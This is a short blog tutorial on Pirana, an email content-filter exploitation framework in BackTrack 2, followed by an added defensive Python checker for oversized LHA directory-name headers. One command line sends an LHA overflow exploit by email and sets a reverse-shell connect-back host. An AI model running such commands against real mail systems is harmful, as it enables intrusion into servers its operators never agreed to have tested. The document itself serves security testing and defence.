
Backtrack 2: Information Gathering -> All -> Pirana



Pirana is an exploitation framework that tests the security of an email content filter. By means of a vulnerability database, the content filter to be tested will be bombarded by various emails containing a malicious payload intended to compromise the computing platform. PIRANA’s goal is to test whether or not any vulnerability exists on the content filtering platform.
(Source: http://www.it-observer.com/tools/34/pirana_smtp_content_exploitation_framework/)

Pirana with all its options:

[Screenshot: pirana1]

We will try out some of the options in Pirana. First we have to compile the exploits.

[Screenshot: pirana2]

Then we will run this command: pirana.pl -e 1 -h linuxhaxor.net -a pavs@linuxhaxor.net -s 0 -l linuxhaxor.net – 80

Here -e stands for exploit; of the six available exploits we are using exploit 1, which is “LHA get_header Directory name overflow”.

-h stands for the host name; -a stands for the destination e-mail address; -s stands for the shellcode type (there are 3 types available); finally, -l stands for the host to connect back to in reverse shell mode.

We tried the command once with -v, to attach the EICAR virus, and once without the virus.

[Screenshot: pirana3]

And the outcome:

Tada…

[Screenshot: pirana4]

There are many combinations of options to play with, but you get an idea of it once you start playing around with it.
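
On the defending side, the “LHA get_header Directory name overflow” case used above is, going by its name, about an overlong directory name in an LHA archive header, which a filter can check for before handing the attachment to any unpacker. The Python below is an added example, not part of Pirana or of the original post; it handles only level-1 headers, does not verify the header checksum, and the 255-byte limit, the function names and the sample headers are assumptions made for illustration.

```python
import struct

MAX_DIR_LEN = 255  # assumed policy limit, not a value from the post

def lha_dir_name_lengths(data):
    """Lengths of all directory-name extended headers (type 0x02) in the
    first level-1 LHA member header of data; ValueError if malformed."""
    if len(data) < 27 or data[2:3] != b"-" or data[6:7] != b"-":
        raise ValueError("not an LHA header")
    if data[20] != 1:
        raise ValueError("only level-1 headers are handled here")
    base_end = data[0] + 2  # the size byte does not count the first two bytes
    if base_end > len(data) or base_end < 27 + data[21]:
        raise ValueError("truncated or inconsistent base header")
    next_size = struct.unpack_from("<H", data, base_end - 2)[0]
    pos, lengths = base_end, []
    while next_size:
        # each extended header = type (1) + data + size of the next one (2)
        if next_size < 3 or pos + next_size > len(data):
            raise ValueError("extended header runs past end of data")
        if data[pos] == 0x02:
            lengths.append(next_size - 3)
        pos += next_size
        next_size = struct.unpack_from("<H", data, pos - 2)[0]
    return lengths

def verdict(data):
    """Filter decision for one attachment; malformed headers fail closed."""
    try:
        lengths = lha_dir_name_lengths(data)
    except ValueError:
        return "quarantine: malformed LHA header"
    if any(n > MAX_DIR_LEN for n in lengths):
        return "quarantine: oversized directory name"
    return "pass"

def sample_header(dir_name):
    """Constructed test input: level-1 header with one directory header."""
    name = b"a.txt"
    ext = bytes([0x02]) + dir_name + struct.pack("<H", 0)
    base = (b"-lh0-" + struct.pack("<III", 0, 0, 0)
            + bytes([0x20, 1, len(name)]) + name
            + struct.pack("<H", 0) + b"U" + struct.pack("<H", len(ext)))
    return bytes([len(base), 0]) + base + ext

if __name__ == "__main__":
    for d in (b"docs\xff", b"A" * 300):
        print(len(d), verdict(sample_header(d)))
```

Truncated or inconsistent headers are quarantined rather than passed, since a filter that skips what it cannot parse leaves the unpacker behind it to deal with the same bytes.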

That’s all!

pavs

